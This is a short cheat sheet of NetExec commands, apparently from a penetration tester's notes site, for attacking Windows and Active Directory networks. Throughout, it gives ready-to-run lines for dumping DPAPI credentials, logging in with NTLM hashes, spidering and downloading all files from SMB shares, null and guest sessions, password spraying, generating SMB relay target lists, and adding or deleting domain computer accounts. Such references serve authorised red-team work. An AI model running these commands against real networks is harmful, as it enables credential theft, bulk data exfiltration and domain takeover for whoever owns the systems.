NetExec

URL to tool: https://github.com/Pennyw0rth/NetExec

Dump credentials

# DPAPI with a password (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -p '<PASSWORD>' --dpapi

# DPAPI with a hash (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -H :'<NTLM-HASH>' --dpapi

SMB shares

# Login with a password
nxc smb hosts.txt -u <username> -p <password> --shares

# Login with a hash
nxc smb hosts.txt -u <username> -H <ntlm>:<ntlm>

# List all readable files
nxc smb <target> -u <username> -p <password> -M spider_plus

# Search for files with certain string
nxc smb <target> -u <username> -p <password> --spider C\$ --pattern <string>

# Dump all files
nxc smb <target> -u <username> -p <password> -M spider_plus -o DOWNLOAD_FLAG=True

Get domain password policy

# With a password
nxc smb <target> -u <username> -p <password> --pass-pol

# With a hash
nxc smb <target> -u <username> -H <ntlm>:<ntlm> --pass-pol

NULL session and guest logon

# NULL session
nxc smb hosts.txt -u '' -p '' --shares

# Guest logon
nxc smb hosts.txt -u 'a' -p '' --shares

Password spray

# Continue on successful spray, add --local-auth if needed
nxc smb <target> -u <users.txt> -p <password-to-spray> --continue-on-success

# Username as password
nxc smb <TARGET> -u <users.txt> -p <users.txt> --no-bruteforce --continue-on-success

Enumerate hosts with SMB signing off

nxc smb hosts.txt --gen-relay-list relay_list.txt

Enumerate RDP NLA

# First check for open RDP ports with Nmap
awk '/Nmap scan report/{print $NF}' nmap/rdp-servers | tr -d '()' > rdp-servers.txt
nxc rdp rdp-servers.txt --nla

Check if RDP login is allowed

nxc rdp subnets.txt -u '<FQDN\USERNAME>' -p '<PASSWORD>'

Check group memberships

nxc ldap <DC-IP> -u <USERNAME> -p <PASSWORD> --groups "Protected Users"

Get user description fields

nxc ldap <DC-IP> -u <USERNAME> -p '<PASSWORD>' -M get-desc-users

Change expired password

# Reset password with status STATUS_PASSWORD_MUST_CHANGE or STATUS_PASSWORD_EXPIRED
nxc smb <DC-IP> -u <USERNAME> -p <PASSWORD> -M change-password -o NEWPASS=<NEW-PASSWORD>

# Reset password with an NTLM hash
nxc smb <DC-IP> -u <USERNAME> -H '<NTLM-HASH>' -M change-password -o NEWPASS=<NEW-PASSWORD>

Add computer

nxc smb '<DC-IP>' -u '<USERNAME>' -p '<PASSWORD>' -M add-computer -o NAME='<COMPUTER-NAME>$' PASSWORD='<PASSWORD>'

Delete computer

nxc smb '<DC-IP>' -u '<DA-USER>' -p '<PASSWORD>' -M add-computer -o Delete=True NAME=<COMPUTER-NAME>$ PASSWORD=<COMPUTER-PASSWORD>

PreviousActive Directory NextResponder

Last updated 1 month ago